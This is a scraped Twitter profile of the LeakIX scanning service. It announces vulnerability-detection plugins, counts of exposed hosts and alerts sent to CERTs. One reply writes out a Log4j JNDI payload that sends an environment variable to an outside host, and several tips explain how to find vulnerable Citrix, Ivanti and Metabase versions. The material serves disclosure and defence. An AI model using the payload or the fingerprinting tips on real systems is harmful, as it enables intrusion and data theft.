LeakIX

@leak_ix

Followers
4,744
Following
220
Media
266
Statuses
1,339

Maintaining and reporting for LeakIX.

Joined July 2020
Pinned Tweet
@leak_ix
LeakIX
3 months
🚨 Detection for Check Point Gateway's CVE-2024-24919 has been improved. ~8500 vulnerable gateways found. Hosting providers & CERTs have been notified, patch now! Credits: @watchtowrcyber Thanks: @Gi7w0rm @Chocapikk_
@leak_ix
LeakIX
3 months
🚨 New plugin for Check Point Gateway indexing hosts vulnerable to CVE-2024-24919. ~2400 vulnerable hosts found. Hosting providers & CERTs have been notified, patch now! Credits: @watchtowrcyber
0
3
8
3
11
18
@leak_ix
LeakIX
10 months
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 ( #Cisco IOS EX) it's 100x worse. We used @TalosSecurity IOC check and found ~30k implants. That's 30k devices infected (routers, switches, VPNs), under the control of threat actors. That's excluding rebooted devices.
17
167
443
@leak_ix
LeakIX
10 months
🚨 Cisco Implant traffic detected from 192.3.101[.]111 . Looking for DNS settings, likely to ID targets.
6
73
281
@leak_ix
LeakIX
1 year
Fantastic tool by @circl_lu Analyze a URL's behavior, redirects and loaded resources, add monitoring alerts etc ...
3
62
178
@leak_ix
LeakIX
3 years
I guess I should share my #f12 nuclei template. I'm not sure how it works though.
8
15
121
@leak_ix
LeakIX
1 year
💡If you're looking for vulnerable #Citrix #ADC instances, Citrix recently patched their VPN client for CVE-2023-24491 to 23.5.1.3. That's the version included in the latest ADC patch fixing CVE-2023-3466, you can get it from /vpn/pluginlist.xml
2
27
95
@leak_ix
LeakIX
10 months
⚠️ Cisco exploit attempts from 38.60.199.10 404 because device is already implanted. It secures the devices against further exploitation. Assuming it might be a new actor since they didn't try to use the implant authentication. cc @SI_FalconTeam @Horizon3Attack
1
30
87
@leak_ix
LeakIX
10 months
🚨 CVE-2023-34048 - New plugin released for #VMWare #vCenter . Found ~1100 vulnerable public services with DCERPC enabled. Patch now! Out of 1911 vulnerable hosts 1100 are not fire-walled. Alerts have been dispatched to CERTs and hosting providers. Thanks: @Gi7w0rm
1
26
74
@leak_ix
LeakIX
2 years
Still 25000 DVR solutions running that vulnerable firmware ... LFI for sure, RCE most likely ... Source :
3
20
72
@leak_ix
LeakIX
11 months
🚨 Watching out for IIS vulnerabilities: Vector: Remote Privileges required: None Of course it would include Exchange and so on ...
1
18
67
@leak_ix
LeakIX
1 year
That's just awesome work! Glad we could help and thanks for sharing!
@silentgh00st
Mehdi
1 year
🧵THREAD🧵 How I compromised some servers and downloaded source codes of a company at @Hacker0x01 private program using @leak_ix and @OpenAI ChatGPT
15
114
477
1
8
60
@leak_ix
LeakIX
3 years
We now have a plugin for loading and running basic Nuclei's template files ! Don't forget to check out @pdiscoveryio tool and its awesome template community !
2
14
60
@leak_ix
LeakIX
1 year
Releasing MobileIron Sentry (CVE-2023-38035) information disclosure exploit: Source: @Horizon3Attack -
0
12
49
@leak_ix
LeakIX
10 months
🔎 In the last episode of the #IOS XE exploit research saga, we find out how they replaced Nginx config files. CVE-2023-20273: IOS XE root privilege escalation and implant installation.
3
20
49
@leak_ix
LeakIX
1 year
🚨CVE-2023-40595 ( and friends ) - New plugin released for finding vulnerable #Splunk Web interfaces with version detection. Found ~12000 vulnerable public instances. Note: @NIST tagged it as no auth required. @splunk tagged it as required. Thanks: @Gi7w0rm
3
14
51
@leak_ix
LeakIX
1 year
Just out, we added a new API endpoint to help enumerate subdomains for a given domain :
1
16
47
@leak_ix
LeakIX
11 months
📖 Recon tip time : When looking for information on an IP or network, you might often get more detailed and structured information from RDAP instead of WHOIS. Eg:
0
9
47
@leak_ix
LeakIX
11 months
🚨 CVE-2023-22515 - Plugin released for #Confluence 0day. Found ~700 vulnerable public instances. ⚠️ There are also ~3500 instances still vulnerable to CVE-2022-26134 due to a wider range of versions affected. Patch now! Thanks @Gi7w0rm for the ping
0
11
42
@leak_ix
LeakIX
10 months
CVE-2023-45498 / CVE-2023-45499, announced yesterday affects #VinChin #VMWare #Backup and enables a remote attacker to achieve remote code execution. Vendor failed to acknowledge the vulnerability. Blog post, IOCs and demo at
0
17
39
@leak_ix
LeakIX
10 months
🚨🚨🚨 Things are NOT getting better. Today's scan revealed an additional 10k compromised devices, indicating exploitation is still ongoing. This brings the number of implanted #Cisco IOS EX devices to ~37k . Pretty much feels like Thanos could snap his fingers at any time.
@leak_ix
LeakIX
10 months
🚨🚨🚨 Whatever you were thinking about CVE-2023-20198 ( #Cisco IOS EX) it's 100x worse. We used @TalosSecurity IOC check and found ~30k implants. That's 30k devices infected (routers, switches, VPNs), under the control of threat actors. That's excluding rebooted devices.
17
167
443
2
11
40
@leak_ix
LeakIX
1 year
CVE-2023-25610
1
6
37
@leak_ix
LeakIX
3 years
⚠️Well ... Our Grafana plugin sure becomes handy all of a sudden ... ->
@pdnuclei
nuclei
3 years
New - Grafana unauthorized arbitrary file read Template: by z0ne, dhiyaneshDk Reference: #bugbounty #pentest #appsec
2
181
559
0
9
30
@leak_ix
LeakIX
1 year
⚠️ New plugin released for finding vulnerable Citrix ADC. ~16k found, ~50% have been patched. Cloud images are a mess and some customers currently cannot update because Citrix only updated the BYOL versions. Hosting providers and national CERTs have been notified.
0
7
32
@leak_ix
LeakIX
11 months
🚨 CVE-2023-42793 - New plugin released for #TeamCity authentication bypass. Found ~950 vulnerable public instances. Patch now! The vulnerability allows for full take-over of the server and code execution. Credits: @SonarSource
1
12
30
@leak_ix
LeakIX
1 year
As usual we went the extra step to scan for CVE-2023-27532 ( #Veeam ). We believe that the vulnerability could also be exploited to achieve RCE (BinaryFormatter). Every hosting provider and national CERT is currently being sent the list of vulnerable assets in their scope.
1
6
27
@leak_ix
LeakIX
11 months
🚨 CVE-2023-40044 - New plugin released for #WSFTP RCE. Found ~250 vulnerable public instances. Patch now! Alerts have been dispatched to CERTs and hosting providers. Credits: @assetnote @MCKSysAr Thanks: @Gi7w0rm
1
15
28
@leak_ix
LeakIX
10 months
🚨 New plugin for SysAid On-Prem indexing hosts vulnerable to CVE-2023-47246. 163 hosts found running a version older than 23.3.36 Hosting providers & CERTs have been notified. Patch now!
@Gi7w0rm
Gi7w0rm
10 months
New #ZeroDay abused by #Cl0p #ransomware affiliate! #CVE-2023-47246 is a Path Traversal vulnerability in #SysAid On-Prem software leading to code execution. In the observed case it was abused to deploy a #Webshell on the affected system.
2
36
103
1
12
26
@leak_ix
LeakIX
10 months
🔍 Added IOS XE implant V3 detection on the platform. Here's the current distribution of implant versions per country.
0
7
27
@leak_ix
LeakIX
1 year
💡If you're looking for precise version information on #Ivanti MobileIron Core aka EPMM without disclosing the 0day, you can get it from: /mifs/c/windows/api/v2/device/registration head > script > src attribute Looks like someone mixed 2 template variables.
1
11
24
@leak_ix
LeakIX
1 year
🚨 CVE-2023-39143 - New plugin released for finding vulnerable PaperCut instances. ~1.7k found, ~15% have been patched. Hosting providers and national CERTs have been notified. Source: @Horizon3Attack -
0
8
23
@leak_ix
LeakIX
1 year
We analyzed CVE-2023-34039 - VMWare Aria Operations SSH auth bypass : - Auth is possible with a fixed private key - Key is version dependent - Host key is the same for ALL versions Host key : SHA256:tpcfUoQB+n2Wf6tDNm/YPA7DSwwzFjx3B7cnRC2apZ0 Credit @rootxharsh @iamnoooob 1/2
1
3
23
@leak_ix
LeakIX
10 months
⚠️ Citrix has taken drastic measures to secure its ADC products. From now on the `Last-Modified` headers of public web files are updated every restart. 🤡
7
10
21
@leak_ix
LeakIX
3 years
Done with the Log4j plugin. Our method ensures we're tracking the source server we made the request to. This means a 404 on a random server, can trigger a reply from a logging server in Amazon. ping @CristiVlad25 Available to trusted users only.
0
1
23
@leak_ix
LeakIX
9 months
⚠️⚠️ [PROBLEMTYPE] in [PRODUCT] is quite a [SEVERITY] issue. We found [EVENTCOUNT] services affected. Everybody was sent no alerts whatsoever.
@CVEnew
CVE
9 months
CVE-2023-38363 [PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]
9
39
145
2
0
21
@leak_ix
LeakIX
2 years
Our technical overview of what happened with the China Leak Default Cloud Security settings must not be trusted
0
6
19
@leak_ix
LeakIX
3 years
In 2021, you opened 573 reports, fixed 135, most of them critical! Thanks to all our researchers, thanks for trusting us, let's make 2022 the year we prove there's a place for un-scoped research ! Special thanks to @HaboubiAnis @CristiVlad25 @dwillems42
0
2
19
@leak_ix
LeakIX
11 months
🚨 CVE-2023-29357 - New plugin released for #SharePoint 2019 authentication bypass. Found ~200 vulnerable public instances. The vulnerability allows for full take-over, document exfiltration and more. Credits: @starlabs_sg , @Chocapikk_ Thanks: @Gi7w0rm
0
7
20
@leak_ix
LeakIX
1 year
Finally releasing our new file indexing and search project. We integrated #ClamAV and #Yara scanning and are archiving suspicious files we come across. We also look into compressed files.
0
6
20
@leak_ix
LeakIX
2 years
Working on a new project 😶 hxxp://157.230.104.109/ -> infected files and powershell cc @vxunderground
3
1
20
@leak_ix
LeakIX
3 years
@_StaticFlow_ Use ${jndi:ldaps://${env:user}.xyz.collab.com/a} and get direct connections with the hostname inside the TLS handshake you just initiated.
0
4
18
@leak_ix
LeakIX
1 year
⚠️ 5 days ago @CISA added CVE-2023-27532, to their known exploited vulnerabilities list. It impacts Veeam and can lead to full infrastructure compromise including backups and server credentials. There are still ~200 vulnerable instances currently online, 90% have been patched.
0
7
19
@leak_ix
LeakIX
2 years
A quick first look at open Consul servers : 1800, not so bad.
0
5
18
@leak_ix
LeakIX
1 year
Current #Citrix #ADC patching state: ~5000 hosts fixed since yesterday, around 30%
0
0
18
@leak_ix
LeakIX
1 year
Suspect activity since September 2022: More than 4M free domain names have been registered and are displaying single page content related to FUDing BTC, social networks and sexual orientation. Impacted domains : ga, tk, cf
3
1
18
@leak_ix
LeakIX
10 months
It has been brought to our attention that the product name is IOS XE and not IOS EX. It's really too bad because the filenames were pretty sexy to work with 🤷 ( It's been a long night )
1
1
18
@leak_ix
LeakIX
2 years
Yes, Kafka servers are also left open without authentication. And it's as bad as open databases :
0
2
15
@leak_ix
LeakIX
1 year
New side project for education purposes, scam call transcripts:
0
1
15
@leak_ix
LeakIX
2 years
Yearly reminder
@reybango
Rey Bango 🇺🇦🌻
2 years
Still my favorite sticker. 😈
18
254
1K
1
3
15
@leak_ix
LeakIX
2 years
Tweet media one
1
0
16
@leak_ix
LeakIX
1 year
We built LeakIX on personal money with a severance package received from COVID, already sending free alerts to CERTs. We refused external interference, multiple times, losing money and eating junk for 6 months. @dwillems42 then joined and we started profiting. 1/2
@malwrhunterteam
MalwareHunterTeam
1 year
1st: Fuck every single people giving even just $1 to Cyble. 2nd: Fuck @TechCrunch for writing an article about that & saying not a single word about what kind of piece of shit company Cyble is. 3rd: fuck Cyble, as usual. 😫😫😫 cc @idclickthat @Iamdeadlyz @ULTRAFRAUD @JAMESWT_MHT
5
4
35
1
2
14
@leak_ix
LeakIX
1 year
Huge shout out to @Chocapikk_ , @CristiVlad25 and @Gi7w0rm . Over 1 week they have identified and sent personalized reports to 105 companies and institutions on #MobileIron , #SharePoint , #Metabase and #Citrix ADC. You guys are awesome and we're honored to have you on board !
2
0
14
@leak_ix
LeakIX
9 months
🔍Some light on the vulnerability: - ~6000 VCD found - Any password will allow authentication as root - The appliance management web interface is exposed on ~22 hosts - SSH is enabled on ~84 hosts, we weren't able to bypass auth on those. In total 6 hosts were found vulnerable.
@BleepinComputer
BleepingComputer
9 months
VMWare discloses critical VCD Appliance auth bypass with no patch - @serghei
3
39
100
0
3
14
@leak_ix
LeakIX
1 year
🚨 CVE-2023-38646 - New plugin released for finding vulnerable #Metabase instances. ~10k found, ~50% have been patched. Hosting providers and national CERTs have been notified.
0
3
15
@leak_ix
LeakIX
10 months
⚠️ Just a friendly reminder to update your #Citrix #ADC instances. As of today, there are still ~14k public instances running a firmware older than September 2023 and potentially vulnerable to CVE-2023-4966.
0
0
15
@leak_ix
LeakIX
1 year
Today we are free from control, we don't have anyone to report to and look good to, except the community. Our values will always stay the same. The junk eating too.
0
0
14
@leak_ix
LeakIX
1 year
We just added support for CVE-2018-9995. ~2000 DVR are accessible and vulnerable to credentials disclosure. Thanks to @Remzi96 for the suggestion !
1
5
14
@leak_ix
LeakIX
2 years
Totally agree, it was awesome to be in a conf about real tech that wasn't business oriented ❤️. Thanks for having us! We're definitely convinced to start contributing to @MISPProject !
@cudeso
Koen Van Impe ☕
2 years
Thank you @MISPProject and @circl_lu for organising the #CTISummit #CTIS2022 conference. Interesting talks and meeting a lot of nice people. I enjoyed the new format a lot!
0
5
22
0
3
14
@leak_ix
LeakIX
1 year
It's the most difficult part about off-scope bug hunting, and trust us, it breaks our hearts to see good deeds being ignored. Thousands of easy high-value targets are found every day, we're not doing rocket-science here. 1/3
@Gi7w0rm
Gi7w0rm
1 year
107 reports sent for critical vulnerabilities since last month. 65 fixed. Sent several reports aside that are not registered by the platform. Want to know how many I heard back from ? 3 in total. Ungrateful work 😮‍💨 cc: @leak_ix
4
2
30
3
4
14
@leak_ix
LeakIX
1 year
🚨CVE-2023-34124 ( and friends ) - New plugin released for finding vulnerable #SonicWall GMS instances. Found ~100 vulnerable public instances. Hosting providers and national CERTs have been notified. Sources: @rapid7 - Thanks: @Gi7w0rm
0
5
13
@leak_ix
LeakIX
2 years
If you're looking for hosting in Europe > go @Hetzner_Online those guys are just wonderful. 💕
3
1
13
@leak_ix
LeakIX
1 year
Microsoft patches of interest: - MSMQ is back (RCE): CVE-2023-32057, CVE-2023-32045, CVE-2023-32044, CVE-2023-35309 - SharePoint (RCE): CVE-2023-33134, CVE-2023-33157, CVE-2023-33159, CVE-2023-33160, CVE-2023-33165 - RRAS (RCE): CVE-2023-35366, CVE-2023-35367
0
4
13
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35082 - Plugin updated for finding vulnerable MobileIron Core instances taking into account the recent developments affecting versions higher than 11.2. ~1.3k found, Hosting providers and national CERTs have been notified. Source @rapid7 and MobileIron KB
2
3
13
@leak_ix
LeakIX
1 year
⚠️ Remember Zimbra's CVE-2022-27925 ? We have indicators showing threat actors are using the vulnerability to access user mailboxes. They are then sending various scams to every email they can find in the system.
0
5
13
@leak_ix
LeakIX
1 year
🚨 New plugin in town, we added detection for #SharePoint 2019 versions covering : CVE-2023-33134 CVE-2023-33157 CVE-2023-33159 CVE-2023-33160 CVE-2023-33165. Alerts have been sent to participating CERTs and network providers.
0
3
11
@leak_ix
LeakIX
2 years
Tagged all the confluence server >= 7.4 Results are now public here :
0
4
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35885 - New plugin released for finding vulnerable CloudPanel instances. ~57k found, ~70% have been patched. Hosting providers and national CERTs have been notified. Source :
0
6
12
@leak_ix
LeakIX
1 year
@DailyOsint Damn, we launched the same this week but added virus and Yara scan:
2
2
11
@leak_ix
LeakIX
1 year
Ivanti Endpoint Manager Mobile - CVE-2023-35078 exploit is now public.
@pdnuclei
nuclei
1 year
Scan for Ivanti Endpoint Manager Mobile (EPMM) - Authentication Bypass (CVE-2023-35078) using nuclei templates. Nuclei Template - CISA Advisory - nuclei -id CVE-2023-35078 -list urls
1
69
245
0
4
12
@leak_ix
LeakIX
3 years
Don't want to start Friday lost in results pages ? Go explore Internet in our graph explorer ! 👉 📘 Delivered on schedule, preview free for everyone !
1
3
12
@leak_ix
LeakIX
1 year
Upcoming change: Starting tomorrow our API will be available to authenticated users only. Update your tooling !
0
2
11
@leak_ix
LeakIX
2 years
@GossiTheDog Aaaand it's gone
0
0
1
@leak_ix
LeakIX
1 year
💡If you're looking for vulnerable #Metabase instances, you can get the version number from /api/session/properties .
1
1
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35078 - New plugin released for finding vulnerable #Ivanti MobileIron Core instances. ~3k found, ~40% have been patched. Hosting providers and national CERTs have been notified.
0
6
10
@leak_ix
LeakIX
2 years
Current Forti* CVE-2022-40684 exposure : Credits @Horizon3Attack for the payload.
3
6
11
@leak_ix
LeakIX
1 year
🚨 CVE-2023-39848 - This is no laughing matter and should be taken seriously. ~999,999,999 found, 0% patched as the vendor is not releasing a new version and merely suggests a̵n̵ ̵R̵P̵M̵ ̵f̵i̵x̵. nothing. Secret services have been notified.
@HunterMapping
Hunter
1 year
🙅Rejected🙅‍♂️ CVE-2023-39848 Feel free to laugh out loud 🤣🤣🤣, unless your instances are exposed 👀 🧷 Dork 👇👇👇 "Damn Vulnerable Web Application (DVWA)" #infosec #infosys #BugBounty
2
6
9
2
6
11
@leak_ix
LeakIX
2 years
After the brilliant talk by @PatriceAuffret from @Onyphe at CTI-Summit, we decided to join the movement and follow the 10 Commandments for Ethical Internet Scanning. More info on our probe network at
0
2
11
@leak_ix
LeakIX
1 year
Check our new open source #WordPress #scanner WpFinger :
0
1
11
@leak_ix
LeakIX
10 months
@ACEResponder Always use io.LimitReader on untrusted inputs, apply proper ctx and tcp deadlines.
0
0
11
@leak_ix
LeakIX
1 year
Starting today we are changing our scanning methodology. Vulnerabilities will be re-scanned every day to avoid confusion on older results. Our plans will be adapted next month to allow searching on older/patched vulnerabilities. Current subscriptions will not be affected.
0
1
11
@leak_ix
LeakIX
1 year
🤷Ivanti MobileIron Core strikes back : CVE-2023-35081 - Remote Arbitrary File Write We are seeing 3 new versions being deployed : 11.10.0.3, 11.9.1.2 and 11.8.1.2
1
3
10
@leak_ix
LeakIX
1 year
Do you need to integrate our platform in your own solution ? The hook documentation is out !
0
0
8
@leak_ix
LeakIX
10 months
🚨 New plugin for Apache ActiveMQ is up! Still ~2900 vulnerable instances running on standard ports. CVE-2023-46604 is currently exploited in the wild.
@Shadowserver
The Shadowserver Foundation
10 months
We are scanning & reporting out Apache ActiveMQ instances vulnerable to CVE-2023-46604, a deserialization of untrusted data RCE. 3329 vulnerable brokers found out of 7249 accessible (2023-10-30). Data in new daily Accessible ActiveMQ Service report:
1
4
6
1
2
10
@leak_ix
LeakIX
1 year
🙏 Another appliance saved from disaster. Feels good to read positive feedback from our prevention program. We'll always do our part and keep network admins in the loop for free about critical issues.
0
1
10
@leak_ix
LeakIX
10 months
If you are a pro user and use the bulk export, you can now use the Python client to do the same. We have just released a new version of the client, `0.1.8`. See . It also includes some fixes in the library l9format, making some fields optional. Enjoy!
2
3
10
@leak_ix
LeakIX
1 year
New POC project 🤔 What's your general experience with other Wordpress scanning projects ?
2
1
9
@leak_ix
LeakIX
10 months
Did any honeypot folks catch this ? cc @SI_FalconTeam @r4shimo
@onyphe
ONYPHE
10 months
🚨BREAKING🚨 #Cisco #CVE_2023_20198 implants version 2 have disappeared. We went down from ~31K implanted devices to 400 devices in less than 24 hours.
0
12
22
2
4
10
@leak_ix
LeakIX
4 years
We've been silent this week, but we come back with a big update :)
1
0
10
@leak_ix
LeakIX
1 year
There's an AI out there faking HTTP responses depending on the URL you query 🤣
2
1
9
@leak_ix
LeakIX
4 years
This bot is currently crawling the internet for open #Laravel debuggers and storing API keys :
0
4
9
@leak_ix
LeakIX
2 years
Twitter is now the Mastodon user directory.
0
2
9
@leak_ix
LeakIX
4 years
We're now scanning and indexing #IPv6 as well
1
2
9
@leak_ix
LeakIX
1 year
⚠️ CVE-2023-35082 - Only ~200 patched since. Ivanti communication has been confusing: - No new version has been released to address the updated issue - People are assuming they're running the last version - No new CVE was issued for a different vulnerability
@leak_ix
LeakIX
1 year
🚨 CVE-2023-35082 - Plugin updated for finding vulnerable MobileIron Core instances taking into account the recent developments affecting versions higher than 11.2. ~1.3k found, Hosting providers and national CERTs have been notified. Source @rapid7 and MobileIron KB
2
3
13
1
5
9
@leak_ix
LeakIX
3 years
We've tried to get further on this. If anyone ( any country ) has deployed the application from its official docker image, the endpoint for issuing CERTs was exposed without authentication.
@phretor
Federico Maggi
3 years
[THREAD] One of the (main?) reasons why we keep seeing exposed services, like the DGCI web frontend which led to the whole mess we witnessed today, is because people just trust Docker Compose files and don't understand the simplest of all options: port forwarding. [1/N]
2
11
39
0
4
9
@leak_ix
LeakIX
1 year
New design is out! Time to embrace our cyber-punk side and bring some colors into life!
1
1
8
@leak_ix
LeakIX
1 year
📖 You have all been asking for it! The documentation is finally here! Including query syntax, all the fields and a dork library. 👉
0
2
8
@leak_ix
LeakIX
2 years
FFS, please stop making HackerOne your only security contact point.
4
0
6